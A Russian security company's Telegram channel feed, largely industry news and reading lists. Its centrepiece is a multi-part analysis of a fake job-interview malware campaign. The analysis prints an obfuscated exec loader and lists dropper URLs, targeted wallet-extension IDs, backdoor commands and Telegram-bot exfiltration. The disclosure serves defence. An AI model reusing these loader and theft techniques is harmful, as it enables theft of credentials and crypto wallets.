Рекриптор
228 subscribers
88 photos
12 videos
3 files
263 links
Заметки на полях о практической безопасности и не только
Download Telegram
Хорошее и достаточно полное исследование формата антивирусных баз Windows Defender с упором на простые сигнатуры (последовательности байт, строки). Интересно, что таких сигнатур на хосте не так уж и много - несколько сотен тысяч. Это объясняется в том числе большими объёмами памяти, необходимыми для развёртывания структур быстрого поиска, которые практически во всех антивирусах сейчас древовидные. Миллионы простых сигнатур по типу описываемых в исследовании - это сложно для движков, базирующихся, например, на Ахо-Корасик и производных от него. Даже с костылями по типу списков на третьем-четвёртом уровне дерева поиска выходит всяко не очень. Кто хочет убедиться, может попробовать скормить миллион простых сигнатур опенсорсному ClamAV и поглядеть, что будет. С деревьями хэшей плюс-минус та же история. Это одна из причин появления более сложных комплексных сигнатур, выходящих по своей сложности за рамки возможностей регулярных языков. А это тоже код в антивирусных базах

#антивирус #почитать
👍5
This media is not supported in your browser
VIEW IN TELEGRAM
Наш тренировочный проект "Часовой Ковальски", о котором мы писали ранее, стал поточнее и пошустрее. Двигаться стал плавнее. Алгоритмы и модели отлаживаются в связке. Трекер уверенно сопровождает нашего датасайентиста

#ии #ковальски #видеоаналитика #робототехника
👍11😍1
Хороший мануал по поиску уязвимостей в устройствах IoT. Несмотря на фаззинг в названии, про фаззинг там не так уж и много

#offensive #iot
👍2
Сегодня Дима Щелкунов вместе с генеральным директором Рекрипта очень мило пообщались с другим Димой Щелкуновым. В результате переписки противник понёс невосполнимые моральные потери.

Хорошо в числе прочего, что мы не используем Телеграм, как и любой другой публичный облачный мессенджер, для корпоративных коммуникаций
😁9🗿1
Тема маскировки обмена с C2 с использованием легитимных известных и часто используемых сервисов не нова. Вот, к примеру, интересная и подробная статья про Cobalt Strike HTTPS Beaconing через серверы Microsoft. А конкретно - через Microsoft Graph API. Весь путь исследования: от идеи до конкретного эксплуатабельного результата.

Очередной привет адептам обнаружения обмена с С2 чисто по трафику

#offensive
👍2
Калужской Бауманке сегодня 65 лет! С чем и поздравляем!
❤‍🔥7🔥5
17 октября в Калуге пройдёт ИКТ-форум, партнёрами которого мы являемся. Расскажем про российский антивирус для Linux VR Protect, ответим на вопросы
👍5
Александр Леонов пишет, Solar купил Digital Security. Я с теплом вспоминаю и бесшабашную конфу ZeroNights, и ребят из Digital Security, с некоторыми из которых завязались практически дружеские отношения. Тогда это была очень сильная и амбициозная команда. Digital Security была одной из лучших российских школ в области offensive security, выпускники которой работают по всему миру. Надеюсь, всё у них будет хорошо
👍6
В сентябре вышла бумажная версия журнала Journal of Computer Virology and Hacking Techniques с моей статьёй про подход к созданию быстрых систем асимметричного шифрования с использованием white-box-криптографии: https://link.springer.com/article/10.1007/s11416-023-00511-z

Исходники шифра доступны здесь: https://github.com/dmschelkunov/wb_poc

В целом выпуск интересный и посвящён российским исследованиям: https://link.springer.com/journal/11416/volumes-and-issues/20-3

Никак не доходят руки переписать генератор случайных чисел на RC4OK (https://ia.cr/2023/1486)
и адаптировать исходники под Linux, но планы такие есть

#криптография #whitebox
👍7
Мошенники становятся изобретательнее.

В Linkedin общаются с соискателями на технические должности, в качестве тестовых заданий просят склонировать проект на Python из репозитория, запустить, сделать скриншоты. В общем, имитация технического собеседования. В одном из файлов содержится замаскированный имплант (по сути, dropper), при запуске которого происходит выкачка из сети других скриптов с разным интересным функционалом: поиск криптокошельков, кэшей браузеров и т.п. с последующей отправкой найденного на удалённый ресурс, reverse shell с интересной реализацией сетевого обмена, попытка поставить anydesk для удалённого администрирования и получения полного контроля над машиной жертвы. Всё написано на Python и ориентировано на Linux-пользователей.
Подробности опишем позже, там много интересного с технической точки зрения.

IP-адрес мошеннического ресурса: 147.124.197.138. Обратите внимание. И будьте внимательны и осторожны. Фишинг нацеливается и на профессиональных разработчиков тоже.

Большое спасибо основателю Emercoin Олегу Ховайко, который, проведя первичный анализ кода в репозитории, обнаружил имплант и поделился с нами этой информацией.

#offensive #фишинг #vrprotect
👍10
Мне кажется, это очень хорошо. Кто надо российские продукты всё равно протестирует и уязвимости, которые впоследствии будут проэксплуатированы, найдёт. При этом те в России, кто мог бы их обнаружить раньше (а бывают совсем "детские" ошибки), российские продукты не глядят, опасаясь преследования. Надеюсь, ситуация выправится
👍4
«Слово криптана» или как мошенники нацелились на блокчейн-инженеров. Часть 1. Имплант

Не так давно мы анонсировали исследование на эту тему. Как и обещали, делимся результатами. Публиковать статью где-либо долго, поэтому мы решили тезисно и по частям опубликовать результаты этого исследования здесь - в нашем канале. Отметим, что на момент публикации все репозитории и ссылки живые. Здесь приводим не всё, но схема понятна

Итак, вечером 21 октября с нами связался наш коллега — основатель блокчейн-платформы Emercoin Олег Ховайко. Олег обнаружил интересную фишинговую активность в социальной сети Linkedin и решил поделиться с нами этой информацией, а также результатами своих первоначальных исследований.

Сама фишинговая схема, хоть и является довольно свежей, не оригинальна и описана, например, здесь и здесь. В случае, обнаруженном Олегом, мошенники мимикрировали под работодателя, разыскивающего специалистов по блокчейн-технологиям. Мошенники в процессе «собеседования», которое проходит, конечно же, онлайн, предлагают скачать проект из репозитория, запустить код, сделать скриншоты. Вот один из таких репозиториев, на который любезно указал нам Олег. Будьте внимательны с этим репозиторием и не запускайте этот код у себя, если у вас нет достаточных знаний и опыта! Интерес представляет файл pypay/libra.py. В нём находится имплант следующего вида:
zg="tGlmYksYLGExQeQcSNC4jDU0GNFNjbBgzBDQbHCs4GDNFfhEfMC5gRUM9DhA2ITceCCoYWwYTLgEd...
exec("from base64 import b64decode;d1=b64decode(zg[9:]);sk=zg[1:9];sl=len(d1);mq=''\
    for l0 in range(sl):k=l0&7;w=chr(d1[l0]^ord(sk[k]));mq+=w\nexec(mq)")

Имплант пытались «скрыть» за большим числом символов табуляции, чтобы уменьшить вероятность случайного обнаружения при беглом анализе кода. Дальнейшее исследование проводилось уже непосредственно нашей командой.

Сам имплант представляет собой, как видно на листинге выше, Base64-строку довольно большого размера, после которой следует код её декодирования с последующим нехитрым расшифрованием с помощью xor. В результате получается код следующего вида:
_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]))
exec((_)(b'=UsIfc9D+//vPz/r3TQOhAC8tx55A6ktxAvPff96J/J9+PyH1kQX5VQfR/lyANmVNWHseBJQ6...

Эта лямбда-функция декодирует подаваемую на вход строку, предварительно проинвертировав её. После первой итерации декодирования получим такой результат:
exec((_)(b’{новая строка base64…}))

И так много десятков раз :) В конечном итоге после многократного декодирования мы получим нагрузку — dropper, который получает управление, скачивает файл с адреса http://<XXX.XXX.XXX.XXX>:1245/m/NVRlYW05, сохраняет по пути {домашний каталог пользователя}/.vscode/m2 и запускает его.

Продолжение следует...

#offensive #malware #фишинг #blockchain
🔥12
«Слово криптана» или как мошенники нацелились на блокчейн-инженеров. Часть 2. Доступ к криптокошелькам

В предыдущем посте мы стартовали серию микростатей на тему фишинга среди блокчейн-инженеров. Продолжим погружение. Ранее мы писали, что вредоносный имплант скачивает файл с адреса http://<XXX.XXX.XXX.XXX>:1245/m/NVRlYW05, сохраняет по пути {домашний каталог пользователя}/.vscode/m2 и запускает его.

m2
В файле m2 используется кодирование, аналогичное описанному ранее. Вообще во всех исследованных нами скриптах обфускация выглядит одинаково. m2 – это stealer, который делает следующее:
• по адресу http://<XXX.XXX.XXX.XXX>:1245/keys отправляет пакет со следующим содержимым: {текущее время, тип нагрузки (в нашем случае значение 'NVRlYW05'), имя компьютера, 'ojq', '4C2' + текущая рабочая директория};
• подключается к http://<XXX.XXX.XXX.XXX>:1245/client/NVRlYW05, скачивает файл в {домашний каталог пользователя}/.vscode/client и запускает его;
• ходит по папкам браузеров Chrome, Opera, Brave и ищет папки расширений криптокошельков, все найденные файлы из этих папок отправляет на сервер http://<XXX.XXX.XXX.XXX>:1245/bin;
• если на компьютере установлена Windows, отправляются файлы расширений криптокошельков браузера Microsoft Edge;
• если установлена MacOS, отправляются файлы из папки /Library/Keychains/login.keychain, сохраненные пароли браузеров Brave, Chrome;
• если установлена Linux, то оправляются файлы из папки /.local/share/keyrings/, а также сохраненные пароли браузеров Chrome, Firefox

Папки расширений криптокошельков приведены на листинге ниже:
Locals = [
    'nkbihfbeogaeaoehlefnkodbefgpgknn', # metamask2
    'ibnejdfjmmkpcnlpebklmnkoeoihofec', # Tron
    'ejbalbakoplchlghecdalmeeeajnimhm', # Metamask2
    'fhbohimaelbohpjbbldcngcnapndodjp', # BNB Chain Wallet
    'bfnaelmomeimhlpmgjnjophhpkkoljpa', # Phantom
    'hnfanknocfeofbddgcijnmhnfnkdnaad', # Coinbase Wallet extension
    'fnjhmkhhmkbjkkabndcnnogagogbneec', # Ronin Wallet
    'aeachknmefphepccionboohckonoeemg', # Coin98 Wallet
    'hifafgmccdpekplomjjkcfgodnhcellj'  # Crypto.com | Wallet Extension
]


client

client – это dropper (практически аналогичный libra.py), который скачивает два файла. Первый файл загружается с http://<XXX.XXX.XXX.XXX>:1244/payload/NVRlYW05 и сохраняется в рабочей директории как .vscode/pay. Второй - c http://<XXX.XXX.XXX.XXX>:1244/bow/NVRlYW05 и сохраняется как .vscode/bow (при условии, что компьютер управляется ОС Linux или Windows).

pay

Файл pay скачивается закодированным по тому же принципу, что и файлы выше. При запуске он:
• собирает информацию о компьютере: uuid, система, релиз системы, версия системы, название компьютера, уникальный идентификатор;
• с помощью сервиса http://ip-api.com/json получает информацию о сетевом подключении: страна, город, широта, долгота, ip, внутренний ip, временная зона и т.д;.
• всю эту информацию отправляет по адресу http://<XXX.XXX.XXX.XXX>:1244/keys;
• инициирует подключение через raw sockets к XXX.XXX.XXX.XXX по 1245 порту и ждет от сервера команд вида {‘code’: value, ‘args’: value}.

code может иметь значения от 1 до 9:
A.cmds = {1:A.ssh_obj,2:A.ssh_cmd,3:A.ssh_clip,4:A.ssh_run,5:A.ssh_upload,6:A.ssh_kill,7:A.ssh_any,8:A.ssh_env,9:A.ssh_zcp}

Каждое такое значение обозначает функцию, которую необходимо вызвать с аргументом args

Т.е. pay является полноценным бэкдором с достаточно широким функционалом, описание которого представим в самом скором времени.

Продолжение следует...

#offensive #malware #фишинг #blockchain
🔥10
«Слово криптана» или как мошенники нацелились на блокчейн-инженеров. Часть 3. Бэкдор, RAT и при чём тут Telegram

Как мы говорили выше, описание атаки продолжим довольно скоро. Продолжаем. В этой части разберём возможности устанавливаемого в систему бэкдора pay, список команд которого приведён в предыдущем посте, а также дальнейшую вредоносную активность.

Ниже приведено детально описание команд бэкдора pay:
ssh_obj – исполняет команды, полученные от сервера (по сути, выполняет полученную строку через subprocess.Popen(…) с аргументом shell = True). Таким образом можно выполнить практически любое действие в системе жертвы. Крайне полезно для закрепления, повышения привилегий и дальнейшего продвижения.
ssh_cmd – если args == delete, то удаляет данный файл после закрытия соединения (других аргументов в коде скрипта обнаружено не было).
ssh_clip – отправляет на сервер содержимое глобальной переменной e_buf (о ней расскажем чуть позже).
ssh_run – скачивает c http://<XXX.XXX.XXX.XXX>:1244/brow/NVRlYW05 в ~/.n2/bow и запускает его.
ssh_upload – в зависимости от переданного аргумента может загружать папки, файлы, искать определенные файлы и папки и загружать их.
ssh_kill – завершает процессы браузеров Brave и Chrome.
ssh_any – скачивает нагрузку с http://<XXX.XXX.XXX.XXX>:1244/adc/NVRlYW05 в ~/.n2/adc и запускает её.
ssh_env – в аргументе приходят данные для подключения к FTP-серверу. Если компьютер работает под управлением Windows, происходит отправка файлов из папок ~/Documents и ~/Downloads. В противном случае отправляются файлы из папок ~/home ~/Volumes.
ssh_zcp – создает временную папку, в которую копирует файлы из расширений браузеров, которые являются криптокошельками. Список весьма внушительный, публиковать его здесь мы не будем. Просто поверьте, что там много. Значительно больше, чем в листинге из предыдущего поста. В эту же папку копируются файлы клиентских криптокошельков:
app_win_array={r"%LocalAppData%\\1Password":"1pass",r"%AppData%\\Exodus":"exodus",
                   r"%AppData%\\atomic":"atomic",r"%AppData%\\Electrum":"electrum",
                   r"%AppData%\\WinAuth":"winauth",
                   r"%AppData%\\Proxifier4\\Profiles":"proxifier4",
                   r"%AppData%\\Dashlane":"dashlane"}app_osx_array={m_base_p+"Exodus":"exodus",m_base_p+"atomic":"atomic"}
app_linux_array={l_conf_p+"Exodus":"exodus",l_conf_p+"atomic":"atomic"}


После этого временная папка сжимается и отправляется Telegram-боту, токен от которого был получен в аргументе к команде (работа через Telegram набирает популярность). Если отправка боту завершилась с ошибкой, происходит загрузка на FTP сервер.
Если система работает под управлением Windows, будет запущен keylogger, результаты которого будут записываться в глобальную переменную e_buf, содержимое которой, в свою очередь, будет отправлено на сервер при вызове функции ssh_clip, о которой шла речь выше.

По сути, бэкдор позволяет на время своей работы получить контроль над системой с теми же возможностями, что и текущий пользователь.

Но это ещё не всё. Ведь у нас осталось ещё два скрипта: bow и adc

bow

Скрипт bow пытается дешифровать логин и пароль из популярных браузеров (Chrome, Opera, Brave, Yandex, Microsoft Edge) и отправить их на http://<XXX.XXX.XXX.XXX>:1244/keys

adc

Если компьютер находится под управлением Windows, скрипт пытается обратиться к http://<XXX.XXX.XXX.XXX>:1244/any , скачать Anydesk.exe (утилита для удалённого администрирования системы) и установить его. После этого в конфигурационный файл прописываются свои данные. Если же компьютер находится под управлением Linux, скрипт пытается найти уже установленный Anydesk и дописывает в файл конфигурации свои данные. Таким образом на системе жертвы устанавливается полноценный RAT (Remote Access Trojan) с широчайшими возможностями для любых дальнейших действий.

Выводы... А выводы будут чуть позже

#offensive #malware #фишинг #blockchain
🔥8👍3
«Слово криптана» или как мошенники нацелились на блокчейн-инженеров. Часть 4. Заключение

В этом посте попытаемся обобщить результаты анализа фишинговой активности и вредоносных нагрузок (см. часть 1, часть 2 и часть 3).

Первый вопрос, который всплывает в голове: единственный ли это репозиторий, который используется мошенниками? К сожалению, нет. Вот пример ещё одного репозитория, где имплант находится в файле public/Marketing/imgs/fb-logo.png . Этот файл, несмотря на вводящее в опасное заблуждение расширение, является обфусцированным js-скриптом, который обращается к папкам расширений криптокошельков браузеров (Chrome, Opera, Brave, Firefox, Microsoft Edge), собирает оттуда файлы и отправляет их по адресу http://XXX.XXX.XXX.XXX:1224/uploads. Также этот скрипт загружает файл client с адреса http://XXX.XXX.XXX.XXX:1224/client/10/106. Если машина управляется Windows, дополнительно скачивается архив pi2.zip с адреса http://XXX.XXX.XXX.XXX:1224/pdown. В архиве находятся python-скрипты с названиями, функционалом и методами обфускации, сходными с описанными выше. Это говорит нам об одном авторстве вредоносных нагрузок. Разница, по сути, только в имплантах.

Качество фишинговых атак возрастает. Сайты компаний и объявления сделаны довольно качественно, репозитории с кодом размещены на популярных площадках. Сами импланты и их обфускация заслуживают отдельного внимания. Импланты размещены «глубоко в коде» - в файлах, расположенных «не на виду», которые при беглом взгляде кажутся совершенно не важными, чтобы заострять на них внимание. Обфускация и шифрование имплантов призваны затруднить декодирование вредоносной нагрузки. Незаинтересованный человек, даже если увидит имплант, скорее всего просто не станет дальше копать и прекратит общение с мошенниками, потому что декодирование нагрузки требует некоторого времени и немного поскриптовать. В декодированных вредоносных скриптах адреса удалённых ресурсов не присутствуют в явном виде, а собираются из закодированных строк. Всё вышесказанное намекает на противодействие в том числе и автоматизированному анализу.

Специалисты по блокчейн выбраны в качестве жертв неслучайно, т.к. вероятность, что на их устройствах будут криптокошельки, существенно выше, чем в других случаях. Впрочем, нагрузки достаточно универсальны, довольно неплохо сделаны и могут использоваться не только для атак на блокчейн-инженеров. Кражей кошельков дело не ограничивается - мошенники пытаются получить доступ к другой чувствительной информации: логины с паролями, содержимое буфера обмена. Также запускается backdoor, что позволяет злоумышленникам осуществлять широкий спектр действий на компьютере жертвы. В этот момент злоумышленники знают о системе жертвы практически всё, что позволяет им работать целенаправленно, повышая свою эффективность. Запуск Anydesk в роли RAT усугубляет проблему и позволяет мошенникам оперировать компьютером жертвы практически как своим собственным.

Загрузка данных Telegram-боту выглядит интересно. Технология не так уж и нова, но довольно удобна и эффективна, поэтому набирает популярность и встречается всё чаще. Даже в корпоративных инфраструктурах блокировка Telegram – не столь частое явление, а зачастую Telegram – это полноценный рабочий инструмент в том числе и в больших компаниях. Десктопные клиенты мессенджеров в корпоративной инфраструктуре встречаются нередко, а значит, такой трафик не вызовет подозрений на периметре. Т.е., если соискатель проходит «собеседование» на рабочем месте в компании, то, учитывая внушительные возможности устанавливаемого злоумышленниками инструментария, вероятность компрометации всей корпоративной инфраструктуры крайне высока.

Число вредоносов на некомпилируемых языках (типа Python) растёт. Это позволяет атаковать широкий спектр систем, базирующихся на Windows, Linux, MacOS.

#offensive #malware #blockchain
🔥6👍1🤯1
Для тех, кто интересуется фаззингом, свеженькая презентация доклада Advanced Fuzzing With LibAFL с Ekoparty 2024: https://docs.google.com/presentation/d/1ILXdsBx6JJbsf3uq-_hSeYux-a0DRRPxebOY65EDE5o/

#реверсинг #почитать #фаззинг
👍3
В Калужской Бауманке прошла Неделя Безопасника.

Небольшая конференция, соревнования CTF, мастер-классы. Были рады поучаствовать: помочь с ресурсами, провести мастер-класс по реверсингу. Соревнования CTF, учитывая,что участвовали младшие курсы, прошли, на наш взгляд, вполне достойно. Крайне радует инициативность студентов, которые организовали эти соревнования. Ребята, вы большие молодцы! Продолжайте в том же духе, а мы вам, конечно, поможем! Далее будем сотрудничать с Бауманкой ещё активнее, у заинтересованных сторон есть желание и ресурсы. Ну а незаинтересованных мы попросту не возьмём в эту лодку ;)

Обещал список интересных, на мой взгляд, работ и ссылок про ИИ в области ИБ. Их на самом деле довольно много, но вот то, что, на мой взгляд, самое вкусное:

Защита

Winter, P., Lampesberger, H., Zeilinger, M., Hermann, E. (2011). On Detecting Abrupt Changes in Network Entropy Time Series. In: De Decker, B., Lapon, J., Naessens, V., Uhl, A. (eds) Communications and Multimedia Security. CMS 2011. Lecture Notes in Computer Science, vol 7025. Springer, Berlin, Heidelberg. https://doi.org/10.1007/978-3-642-24712-5_18

Jaafer Al-Saraireh, Ala' Masarweh, A novel approach for detecting advanced persistent threats, Egyptian Informatics Journal, Volume 23, Issue 4, 2022, Pages 45-55, ISSN 1110-8665, https://doi.org/10.1016/j.eij.2022.06.005

Do Xuan, C. . (2021). Detecting APT Attacks Based on Network Traffic Using Machine Learning. Journal of Web Engineering, 20(1), 171–190. https://doi.org/10.13052/jwe1540-9589.2019

Hasan, M.M., Islam, M.U. & Uddin, J. Advanced Persistent Threat Identification with Boosting and Explainable AI. SN COMPUT. SCI. 4, 271 (2023). https://doi.org/10.1007/s42979-023-01744-x

Щелкунова Н.В, Щелкунов Д.А, О статическом анализе исполняемых файлов на содержание вредоносного кода, РусКрипто-2024 https://ruscrypto.ru/resource/archive/rc2024/files/06_shelkunov_shelkunova.pdf

Cylance Data Team, Introduction to Artificial Intelligence for Security Professionals
Sharma, Sanjay & Challa, Rama & Sahay, Sanjay. (2019). Detection of Advanced Malware by Machine Learning Techniques. 10.48550/arXiv.1903.02966.

Bensaoud, Ahmed & Abudawaood, Nawaf & Kalita, Jugal. (2020). Classifying Malware Images with Convolutional Neural Network Models. 10.48550/arXiv.2010.16108.

Rhode, Matilda & Burnap, Pete & Jones, Kevin. (2017). Early Stage Malware Prediction Using Recurrent Neural Networks. Computers & Security. 77. 10.1016/j.cose.2018.05.010.

Chaoxian Wei, Qiang Li, Dong Guo, Xiangyu Meng, Toward Identifying APT Malware through API System Calls, Security and Communication Networks, vol. 2021, Article ID 8077220, 14 pages, 2021. https://doi.org/10.1155/2021/8077220

S. M. Milajerdi, R. Gjomemo, B. Eshete, R. Sekar, and V. Venkatakrishnan, “Holmes: Real-time apt detection through correlation of suspicious information flows,” in Symposium on Security and Privacy. IEEE, 2019.

M. Barre, A. Gehani, and V. Yegneswaran, “Mining data provenance to detect advanced persistent threats,” in 11th International Workshop on Theory and Practice of Provenance (TaPP), 2019

Xueyuan Han, Thomas F. J.-M. Pasquier, Adam Bates, James Mickens, Margo I. Seltzer, Unicorn: Runtime Provenance-Based Detector for Advanced Persistent Threats. NDSS, 2020, doi:10.14722/ndss.2020.2

Нападение

https://github.com/TheR1D/shell_gpt

https://github.com/aress31/burpgpt

https://github.com/protectai/vulnhuntr

Hilario, E., Azam, S., Sundaram, J. et al. Generative AI for pentesting: the good, the bad, the ugly. Int. J. Inf. Secur. 23, 2075–2097 (2024). https://doi.org/10.1007/s10207-024-00835-x

Happe, Andreas & Cito, Jürgen. (2023). Getting pwn'd by AI: Penetration Testing with Large Language Models. 10.48550/arXiv.2308.00121.

Richard Fang, Rohan Bindu, Akul Gupta, Qiusi Zhan, Daniel Kang. Teams of LLM Agents can Exploit Zero-Day Vulnerabilities. https://doi.org/10.48550/arXiv.2406.01637


#почитать #ии #offensive #антивирус
👍11